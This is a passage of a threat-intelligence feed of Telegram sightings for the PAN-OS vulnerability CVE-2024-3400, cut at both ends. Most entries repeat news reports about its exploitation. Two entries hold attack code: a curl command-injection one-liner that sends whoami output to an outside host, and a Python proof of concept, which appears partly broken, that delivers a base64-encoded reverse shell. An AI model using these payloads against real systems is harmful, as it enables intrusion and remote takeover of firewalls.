as&nbsp;CVE-2024-3400&nbsp;(CVSS score: 10.0), as \"intricate\" and a combination of two bugs in versions PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1&nbsp;of the software.\n\"In", "creation_timestamp": "2024-04-20T11:36:25.000000Z"}, {"uuid": "f9db011a-28a7-4f04-a726-981f5cc23608", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "Telegram/xqLwgw03U8uffaVC5ClQ0871RCc6EYmXqH0HyHWBVESNCw", "content": "", "creation_timestamp": "2024-04-15T20:57:53.000000Z"}, {"uuid": "dc5cdb52-42a0-4726-a3b8-0f0a44fd7813", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/tengkorakcybercrewz/5661", "content": "The Hacker News\nPalo Alto Networks Releases Urgent Fixes for Exploited PAN-OS Vulnerability\n\nPalo Alto Networks has released hotfixes to address a maximum-severity security flaw impacting PAN-OS software that has come under active exploitation in the wild.\nTracked as&nbsp;CVE-2024-3400&nbsp;(CVSS score: 10.0), the critical vulnerability is a case of command injection in the GlobalProtect feature that an unauthenticated attacker could weaponize to execute arbitrary code with root", "creation_timestamp": "2024-04-15T11:33:05.000000Z"}, {"uuid": "5c8caa91-f28d-48e5-8f4c-8f084b460f71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/tengkorakcybercrewz/5510", "content": "The Hacker News\nZero-Day Alert: Critical Palo Alto Networks PAN-OS Flaw Under Active Attack\n\nPalo Alto Networks is warning that a critical flaw impacting its PAN-OS software used in its GlobalProtect gateways is being exploited in the wild.\nTracked as&nbsp;CVE-2024-3400, the issue has a CVSS score of 10.0, indicating maximum severity.\n\"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature", "creation_timestamp": "2024-04-12T15:36:49.000000Z"}, {"uuid": "07216b91-eed3-4945-9272-7dad46645c6c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "Telegram/E3iST3lZwZOutaoSgFfuoZ6eFjpwUIDeSKbyxLV2xONR5Q", "content": "", "creation_timestamp": "2024-05-02T02:23:05.000000Z"}, {"uuid": "d03fb7e5-2212-4127-b44e-af6334c1fb86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/tengkorakcybercrewz/6370", "content": "The Hacker News\nPalo Alto Networks Outlines Remediation for Critical PAN-OS Flaw Under Attack\n\nPalo Alto Networks has&nbsp;shared&nbsp;remediation guidance for a recently disclosed critical security flaw&nbsp;impacting PAN-OS that has come under active exploitation.\nThe&nbsp;vulnerability,&nbsp;tracked as&nbsp;CVE-2024-3400&nbsp;(CVSS score: 10.0), could be weaponized to obtain unauthenticated remote shell command execution on susceptible devices. It has&nbsp;been addressed&nbsp;in", "creation_timestamp": "2024-04-26T15:42:01.000000Z"}, {"uuid": "4d89cc87-6545-452c-b0e8-d06154af233f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/openSource3/196", "content": "CVE ID : CVE-2024-3400 \nSystem : GlobalProtect \nType : Path Traversal -&gt; File Write -&gt; Command Injection \n\nExploit :\n\ncurl https://host/global-protect/login.esp -k -H 'Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/a`curl${IFS}uip/?u=$(whoami)`'", "creation_timestamp": "2024-07-01T10:58:20.000000Z"}, {"uuid": "2bb03566-9430-42c2-b7a9-ad7af5c2270d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://t.me/arpsyndicate/4705", "content": "#ExploitObserverAlert\n\nCVE-2024-3400\n\nDESCRIPTION: Exploit Observer has 121 entries in 11 file formats related to CVE-2024-3400. A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.  Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n\nFIRST-EPSS: 0.139670000\nNVD-IS: 6.0\nNVD-ES: 3.9\nARPS-EXPLOITABILITY: 0.9034926", "creation_timestamp": "2024-04-18T06:22:52.000000Z"}, {"uuid": "3855e4d8-daf2-4c7b-ada2-29bb1c0052da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "Telegram/yoNNgIU2JU4zwFL5vXqVgP00V9P0beeHjRLaro8CHcaWRn8", "content": "", "creation_timestamp": "2024-05-02T02:23:04.000000Z"}, {"uuid": "1bbd0a72-0e20-40f3-9473-568b77b9e087", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "Telegram/4fJFeJ5wEMncTIAvm9r2Byx6uNcv4oy0soLotVitDjc3ZQ", "content": "", "creation_timestamp": "2024-04-15T12:07:39.000000Z"}, {"uuid": "32ce74b1-aa30-4586-80fa-6619be0d2215", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "Telegram/X0dzjxTk4IQGwlNlJMW5UmJJS9z3wfWMawjlmddPJdwjhA", "content": "", "creation_timestamp": "2024-04-20T08:38:34.000000Z"}, {"uuid": "6a024fee-5da9-4996-8191-03295fdcf009", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "Telegram/gQVeNiRB9FmNEWpizRNpKaAMQaaSsyxJAiZzcCo2LcEtMg", "content": "", "creation_timestamp": "2024-04-26T13:00:02.000000Z"}, {"uuid": "66ce91ab-42d3-4bb3-9952-2262ab7776f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/tengkorakcybercrewz/1057", "content": "The Hacker News\nPalo Alto Networks Releases Urgent Fixes for Exploited PAN-OS Vulnerability\n\nPalo Alto Networks has released hotfixes to address a maximum-severity security flaw impacting PAN-OS software that has come under active exploitation in the wild.\nTracked as&nbsp;CVE-2024-3400&nbsp;(CVSS score: 10.0), the critical vulnerability is a case of command injection in the GlobalProtect feature that an unauthenticated attacker could weaponize to execute arbitrary code with root", "creation_timestamp": "2024-04-15T11:33:05.000000Z"}, {"uuid": "7bdce532-4924-4dea-b3bb-bdcbcfd2b20a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "Telegram/vhhEzmgRY5k9H4n1zKpIhYH6yDkuR5My7DFc0Z2Zc7DNKTk", "content": "", "creation_timestamp": "2024-04-17T19:37:57.000000Z"}, {"uuid": "ba988c82-8460-4815-8dbf-8e2e0a1e681b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "Telegram/-0xwnetPYqPdqGXUakMcyEuozmquHKdF_dlJNW3PZBiTFQ", "content": "", "creation_timestamp": "2024-04-12T13:36:33.000000Z"}, {"uuid": "d2d4858d-6981-4205-8d57-5a847a999ff0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/tengkorakcybercrewz/1033", "content": "The Hacker News\nZero-Day Alert: Critical Palo Alto Networks PAN-OS Flaw Under Active Attack\n\nPalo Alto Networks is warning that a critical flaw impacting its PAN-OS software used in its GlobalProtect gateways is being exploited in the wild.\nTracked as&nbsp;CVE-2024-3400, the issue has a CVSS score of 10.0, indicating maximum severity.\n\"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature", "creation_timestamp": "2024-04-12T15:36:49.000000Z"}, {"uuid": "371d98ff-40fe-4b3b-8a4e-2c254bc6d03d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "Telegram/MJSg8Sv1s6244nb3DVYWZm8Rju6lGyMlDeVM6a0Y3fvmnw", "content": "", "creation_timestamp": "2024-05-02T02:23:05.000000Z"}, {"uuid": "ce0f1ac2-afdb-43f1-821d-4df5757e1e48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/tengkorakcybercrewz/1185", "content": "The Hacker News\nPalo Alto Networks Outlines Remediation for Critical PAN-OS Flaw Under Attack\n\nPalo Alto Networks has&nbsp;shared&nbsp;remediation guidance for a recently disclosed critical security flaw&nbsp;impacting PAN-OS that has come under active exploitation.\nThe&nbsp;vulnerability,&nbsp;tracked as&nbsp;CVE-2024-3400&nbsp;(CVSS score: 10.0), could be weaponized to obtain unauthenticated remote shell command execution on susceptible devices. It has&nbsp;been addressed&nbsp;in", "creation_timestamp": "2024-04-26T15:42:01.000000Z"}, {"uuid": "2fa65369-444e-44fe-acb4-8ab7630361f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/KomunitiSiber/1851", "content": "Palo Alto Networks Outlines Remediation for Critical PAN-OS Flaw Under Attack\nhttps://thehackernews.com/2024/04/palo-alto-networks-outlines-remediation.html\n\nPalo Alto Networks has\u00a0shared\u00a0remediation guidance for a recently disclosed critical security flaw\u00a0impacting PAN-OS that has come under active exploitation.\nThe\u00a0vulnerability,\u00a0tracked as\u00a0CVE-2024-3400\u00a0(CVSS score: 10.0), could be weaponized to obtain unauthenticated remote shell command execution on susceptible devices. It has\u00a0been addressed\u00a0in", "creation_timestamp": "2024-04-26T13:49:59.000000Z"}, {"uuid": "a473f95d-9153-4154-8c3e-a731a1fa9299", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/tengkorakcybercrewz/1123", "content": "The Hacker News\nPalo Alto Networks Discloses More Details on Critical PAN-OS Flaw Under Attack\n\nPalo Alto Networks has shared more details of a critical security flaw impacting PAN-OS that&nbsp;has come under active exploitation&nbsp;in the wild&nbsp;by malicious actors.\nThe company described the vulnerability, tracked as&nbsp;CVE-2024-3400&nbsp;(CVSS score: 10.0), as \"intricate\" and a combination of two bugs in versions PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1&nbsp;of the software.\n\"In", "creation_timestamp": "2024-04-20T11:36:25.000000Z"}, {"uuid": "b95fa4bc-26e9-4ab3-aeac-25f80ea2a481", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/KomunitiSiber/1821", "content": "Palo Alto Networks Discloses More Details on Critical PAN-OS Flaw Under Attack\nhttps://thehackernews.com/2024/04/palo-alto-networks-discloses-more.html\n\nPalo Alto Networks has shared more details of a critical security flaw impacting PAN-OS that\u00a0has come under active exploitation\u00a0in the wild\u00a0by malicious actors.\nThe company described the vulnerability, tracked as\u00a0CVE-2024-3400\u00a0(CVSS score: 10.0), as \"intricate\" and a combination of two bugs in versions PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1\u00a0of the software.\n\"In", "creation_timestamp": "2024-04-20T09:15:07.000000Z"}, {"uuid": "83cef2db-f29f-4e2b-8424-454ff8460508", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/KomunitiSiber/1784", "content": "Palo Alto Networks Releases Urgent Fixes for Exploited PAN-OS Vulnerability\nhttps://thehackernews.com/2024/04/palo-alto-networks-releases-urgent.html\n\nPalo Alto Networks has released hotfixes to address a maximum-severity security flaw impacting PAN-OS software that has come under active exploitation in the wild.\nTracked as\u00a0CVE-2024-3400\u00a0(CVSS score: 10.0), the critical vulnerability is a case of command injection in the GlobalProtect feature that an unauthenticated attacker could weaponize to execute arbitrary code with root", "creation_timestamp": "2024-04-15T10:23:59.000000Z"}, {"uuid": "3b6fceb0-72da-4999-aa18-e187bdff1ae3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/KomunitiSiber/1776", "content": "Zero-Day Alert: Critical Palo Alto Networks PAN-OS Flaw Under Active Attack\nhttps://thehackernews.com/2024/04/zero-day-alert-critical-palo-alto.html\n\nPalo Alto Networks is warning that a critical flaw impacting its PAN-OS software used in its GlobalProtect gateways is being exploited in the wild.\nTracked as\u00a0CVE-2024-3400, the issue has a CVSS score of 10.0, indicating maximum severity.\n\"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature", "creation_timestamp": "2024-04-12T13:43:51.000000Z"}, {"uuid": "a620dca6-1e93-4af0-8d75-2fbf5976c59d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "Telegram/StVq-FaRln37olKOwDnJtX0_CQMnOseNBsrwLwlZuEF9bnw", "content": "", "creation_timestamp": "2024-04-16T11:41:23.000000Z"}, {"uuid": "7a18227e-a322-447e-86dd-4737ebf57869", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "Telegram/dO5snbQdMxePgHszdaCozKw2ZDC2Utdn7t-s8A5uvHwWGBc", "content": "", "creation_timestamp": "2025-01-10T10:00:06.000000Z"}, {"uuid": "9ee27e4c-b9e0-4fcf-b9dd-dc0915f2e63b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "Telegram/0yPmZiOpFjixY5aqQ3H9ckJPRTcTZ6i4T4r7w0GIb1VQ48Q", "content": "", "creation_timestamp": "2025-03-13T11:53:25.000000Z"}, {"uuid": "18666a78-3324-4dc2-8ef0-7d5cfa1fee8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "Telegram/v6Zgg5Vk-Mv01es0GiMgRw4R4Hgpyh7g8cnBXSeiBVoZfHw", "content": "", "creation_timestamp": "2025-03-13T11:51:13.000000Z"}, {"uuid": "8be86014-dce9-4e1a-8685-b821f14838b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "Telegram/4OwSIIHM4Phzi6L1Q-57NlPfvr_pP-K8ZqCBqbr0RdiVmEc", "content": "", "creation_timestamp": "2025-04-29T17:00:10.000000Z"}, {"uuid": "62275ac2-6589-444a-af98-f5ad4d2f8451", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/ICyberDefence/352", "content": "RCE, PAN-OS Palo Alto Networks, CVE-2024-3400\n\n\n**************POC**************\n\nimport  requests\n import  base64\n\n def  generate_payload (): \n    # Obfuscated Reverse Shell command for a stealth execution \n    reverse_shell_command  =  \"bash -c 'bash -i &gt;&amp; /dev/tcp/attacker_ip/attacker_port 0&gt;&amp;1'\" \n    encoded_command  =  base64 . b64encode ( reverse_shell_command . encode ()). decode () \n    payload  =  f \"$({{echo {encoded_command} | base64 -d | bash}})\" \n    return  payload\n\n def  send_exploit_request ( target_url ,  payload ): \n    headers  =  { \n        \"User-Agent\" :  \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\" , \n        \"Content-Type\" :  \"application/xml\" \n    } \n    \n    exploit_data  =  f \"{payload}\" \n    response  =  requests . post ( target_url ,  headers = headers ,  data = exploit_data ) \n    \n    return  response\n\n def  exploit_target ( target_url ): \n    payload  =  generate_payload () \n    response  =  send_exploit_request ( target_url ,  payload ) \n    \n    if  response . status_code  ==  200 : \n        print ( \"Exploit successful! Full-system takeover achieved with stealthy reverse shell.\" ) \n    else : \n        print ( \"Exploit failed. Target system may not be vulnerable or payload detected.\" ) \n\ndef  main (): \n    target_url  =  \"https://vulnerablewebsite.com/vulnerable_endpoint\" \n    exploit_target ( target_url ) \n\nif  name  ==  \"main\" : \n    main\n\n************************************************\n\n\n\n\ud83d\udcdb\u05d4\u05e2\u05e8\u05d4\ud83d\udcdb\n\u05d4\u05de\u05d9\u05d3\u05e2 \u05dc\u05de\u05d8\u05e8\u05d5\u05ea \u05dc\u05d9\u05de\u05d5\u05d3\u05d9\u05d5\u05ea \u05d1\u05dc\u05d1\u05d3!\n\n\u267b\ufe0f\u05e9\u05ea\u05e4\u05d5 \u05d0\u05ea \u05d4\u05e2\u05e8\u05d5\u05e5 \u05e9\u05dc\u05e0\u05d5 \u05d5\u05ea\u05de\u05db\u05d5 \u05d1\u05e0\u05d5\u267b\ufe0f\n \n\ud83c\udf10 \u05e2\u05e8\u05d5\u05e5 \u05d8\u05dc\u05d2\u05e8\u05dd: https://t.me/ICyberDefence\n\ud83d\udcac \u05e7\u05d1\u05d5\u05e6\u05d4: https://t.me/+jbSC-tz1I4ZmYTI8", "creation_timestamp": "2024-05-29T09:53:12.000000Z"}, {"uuid": "e8ffa14b-cad1-4a33-89eb-4453cc8c8b5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/Securi3yTalent/173", "content": "CVE-2024-3400 Palo Alto GlobalProtect VPN (0-Day)\n\nFollow us__\nhttps://twitter.com/Securi3yTalent \nhttps://www.facebook.com/Securi3ytalent\nhttps://t.me/Securi3yTalent\n\nBackdoor sample - https://bazaar.abuse.ch/sample/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac/\n\n#paloalto #vpn #0day #bugsbunny #bugbountytips #BugBountyHunter #bugbountytools #regex_Hunter #regexHunter #securityTalent #security_talent #cybersecurity #cybersecuritynews", "creation_timestamp": "2024-05-15T20:38:46.000000Z"}, {"uuid": "2ff7b100-4985-4844-80da-807ae6ad5fe6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2008", "content": "CVE-2024-3400  Palo Alto GlobalProtect VPN (0-Day)\n*\n\u0422\u0435\u0445 \u0434\u0435\u0442\u0430\u043b\u0438 - \u0442\u0443\u0442 \u0445\u043e\u0440\u043e\u0448\u043e \u0440\u0430\u0441\u043f\u0438\u0441\u0430\u043d\u043e\n*\n\u0421\u044d\u043c\u043f\u043b \u0431\u044d\u043a\u0434\u043e\u0440\u0430 - \u0441\u043a\u0430\u0447\u0430\u0442\u044c \u0442\u0443\u0442 (UPSTYLE Backdoor - update.py)\n*\n\u0410\u043d\u0430\u043b\u0438\u0442\u0438\u043a\u0430 \u043e\u0442 PaloAlto + \u0430\u0434\u0440\u0441\u0435\u0441\u0430 \u04212 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 - \u043c\u043e\u0436\u043d\u043e \u0433\u043b\u044f\u043d\u0443\u0442\u044c \u0442\u0443\u0442\n\n#paloalto #vpn #0day", "creation_timestamp": "2024-04-13T12:31:51.000000Z"}, {"uuid": "5038622e-fdb2-4268-9695-82febccd5546", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "Telegram/z8u8NSYDxaKEmd4_jO8W3bUPsh-WvEp00pwiR4LDnEX3NLU", "content": "", "creation_timestamp": "2024-04-15T16:31:22.000000Z"}, {"uuid": "14cfdbbd-94f0-4e7b-a5f7-5fea99a285db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "Telegram/pNPj58cIhDRTk5cUNIxX5TOzgEilpjn4LUYIlRpc9Ppex-I", "content": "", "creation_timestamp": "2024-05-31T15:20:27.000000Z"}, {"uuid": "d2970a5a-7285-4bdc-8704-718bf887d536", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://t.me/breachdetector/496512", "content": "{\n  \"Source\": \"https://leakbase.cc/\",\n  \"Content\": \"Anybody Got Cve-2024-3400 ?\", \n  \"author\": \" (jogging7721)\",\n  \"Detection Date\": \"15 Apr 2024\",\n  \"Type\": \"Data leak\"\n}\n\ud83d\udd39 t.me/breachdetector \ud83d\udd39", "creation_timestamp": "2024-04-15T10:54:23.000000Z"}, {"uuid": "f669a3a7-71c9-422e-b361-0427d31bdf73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "Telegram/WbJ58MQLgnykHYpWXucIpDebU7vRhdtJfWhLYTeDtyle31c", "content": "", "creation_timestamp": "2024-05-25T10:57:27.000000Z"}, {"uuid": "a5d4d7a9-80b0-4f1b-a3d0-c8f4a01d809a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "Telegram/UOHHBMxRluwBU61w_awXYJuAxguiwrdeeElujl86Pp0L-Ng", "content": "", "creation_timestamp": "2024-04-13T18:36:21.000000Z"}, {"uuid": "5d44befd-ec9f-4f82-bb4a-7205eb30bd47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "Telegram/l3U1moiceKMmq79Bm1u4aTqg_byNW2d5ytf8O-b20INEVD0", "content": "", "creation_timestamp": "2024-07-13T20:27:14.000000Z"}, {"uuid": "dc507900-2232-4f3b-a8c5-1c11ee5838a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/true_secator/5666", "content": "Siemens \u0441\u043e\u043e\u0431\u0449\u0430\u0435\u0442, \u0447\u0442\u043e \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0431\u0440\u0430\u043d\u0434\u043c\u0430\u0443\u044d\u0440\u0435 Palo Alto Networks \u0434\u043e\u0431\u0440\u0430\u043b\u0430\u0441\u044c \u0438 \u0434\u043e \u043b\u0438\u043d\u0435\u0439\u043a\u0438 \u0442\u0435\u0445\u0433\u0438\u0433\u0430\u043d\u0442\u0430.\n\n\u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u0430\u044f \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043d\u0443\u043b\u044f \u0443\u0436\u0435 \u043a\u0430\u043a \u043c\u0435\u0441\u044f\u0446 CVE-2024-3400 \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u043b\u0430 \u0442\u0430\u043a\u0436\u0435 \u0438 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 Ruggedcom APE1808, \u043e\u0441\u043d\u0430\u0449\u0435\u043d\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u043c \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u043c \u043c\u0435\u0436\u0441\u0435\u0442\u0435\u0432\u044b\u043c \u044d\u043a\u0440\u0430\u043d\u043e\u043c \u043d\u043e\u0432\u043e\u0433\u043e \u043f\u043e\u043a\u043e\u043b\u0435\u043d\u0438\u044f Palo Alto Networks (NGFW) \u043d\u0430\u0440\u044f\u0434\u0443 \u0441 \u0434\u0440\u0443\u0433\u0438\u043c\u0438 \u0440\u0435\u0448\u0435\u043d\u0438\u044f\u043c\u0438 \u043e\u0442 Fortinet\u00a0\u0438\u00a0Nozomi Networks.\n\nSiemens \u0433\u043e\u0442\u043e\u0432\u0438\u0442 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u043e\u0433\u043e \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430, \u043f\u0440\u0435\u0434\u043b\u0430\u0433\u0430\u044f \u0442\u0435\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0435\u043c \u043e\u0431\u0445\u043e\u0434\u043d\u044b\u0435 \u043f\u0443\u0442\u0438 \u0438 \u043c\u0435\u0440\u044b \u043f\u043e \u0441\u043c\u044f\u0433\u0447\u0435\u043d\u0438\u044e \u043f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u0439.\u00a0\n\n\u041f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0430 \u0445\u043e\u0441\u0442\u0438\u043d\u0433\u0430 \u043f\u0440\u043e\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u044b\u0445 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 Ruggedcom APE1808 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u044f\u043c \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u0442\u044c \u043a\u043e\u043c\u043c\u0435\u0440\u0447\u0435\u0441\u043a\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0435 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u043f\u0435\u0440\u0438\u0444\u0435\u0440\u0438\u0439\u043d\u044b\u0445 \u0432\u044b\u0447\u0438\u0441\u043b\u0435\u043d\u0438\u0439 \u0438 \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0432 \u043f\u0440\u043e\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u044b\u0445 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445.\u00a0\n\n\u041a\u0430\u043a \u0441\u0442\u0430\u043b\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e, CVE-2024-3400 \u0448\u0438\u0440\u043e\u043a\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430\u0441\u044c \u0435\u0449\u0435 \u0434\u043e \u0442\u043e\u0433\u043e, \u043a\u0430\u043a Palo Alto Networks \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u043a\u0430\u043a\u0438\u0435-\u043b\u0438\u0431\u043e 